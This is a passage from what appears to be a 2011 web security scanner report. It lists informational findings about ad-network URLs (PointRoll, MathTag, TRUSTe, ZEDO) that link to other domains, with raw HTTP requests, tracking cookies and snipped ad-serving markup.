Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVnCn7AEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-9C95-FB29-0309-8D40011C0203; PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4402
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-8E99-8AB9-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://adclick.g.doubleclick.net/aclk?sa=L&ai=BIxur6wnITYvYL8G6lQfEiM2BDqTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEGmALADLgCGMgC5In4GeACAOoCEDMwMHgyNTBDX0dlbmVyYWyQA6QDmAPgA6gDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAE&num=1&sig=AGiWqtwblKQkvKvYR7-meTWiSF-YSMCUiw&client=ca-pub-6743622525202572&adurl=http://clk.pointroll.com/bc/?a=1472054&c=1&i=D9A20400-8E99-8AB9-0309-8D40011C0203&clickurl=http://ad.doubleclick.net/click%3Bh=v2%7C3DC0%7C0%7C0%7C%252a%7Cd%3B239992381%3B0-0%3B0%3B60927427%3B31-1%7C1%3B41081340%7C41099127%7C1%3B%3B%253fhttp://www.ford.com/commercial-trucks/%3Fbannerid=691050%7C60927427%7C239992381%7C0%26referrer=N3106.GoogleContentNetwork'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg?PRAd=1472054&PR
...[SNIP]...

17.13. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1278430A22620110421174444&flash=10&time=13049554901|10:38|-5&redir=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26redirectURL=$CTURL$&pos=x&dom=http://optimized-by.rubiconproject.com&r=0.17236664076335728 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2578662&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmco7OtAEECAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-A39C-ADB3-0309-A36001040200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:11|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:2|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:2|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1999
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-E3A0-8979-1309-A36001100200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-&redirectURL=http://clk.pointroll.com/bc/?a=1473804&c=1&i=D9A20400-E3A0-8979-1309-A36001100200&clickurl=http://www.playtexbramakeover.com/'><img border=0 width='728' height='90' style='width:728px;height:90px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Hanes/863118/PTX_728x90_BF.jpg?PRAd=1473804&PRCID=1473804&PRplcmt=1278430&P
...[SNIP]...

17.14. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304949603; mt_mop=4:1304955375

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:46 GMT
Set-Cookie: mt_mop=4:1304955494; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:38:46 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:38:11 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 999
Content-Type: text/html
Connection: keep-alive

<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$"></script>
...[SNIP]...
259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2363415&Page=&PluID=0&Pos=6279" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2363415&Page=&PluID=0&Pos=6279" border=0 width=300 height=250></a>
...[SNIP]...

17.15. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect="></SCRIPT>
...[SNIP]...
285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://ad.doubleclick.net/jump/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629?"><IMG SRC="http://ad.doubleclick.net/ad/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.16. http://choices.truste.com/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3988

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
<hr />\
<a href="http://bit.ly/dKnbdp" target="_blank">Online Privacy Library &raquo;</a>
...[SNIP]...
<hr />\
<a href="http://bit.ly/ffdQkR" target="_blank">AT&amp;T Privacy FAQ &raquo;</b>
...[SNIP]...

17.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
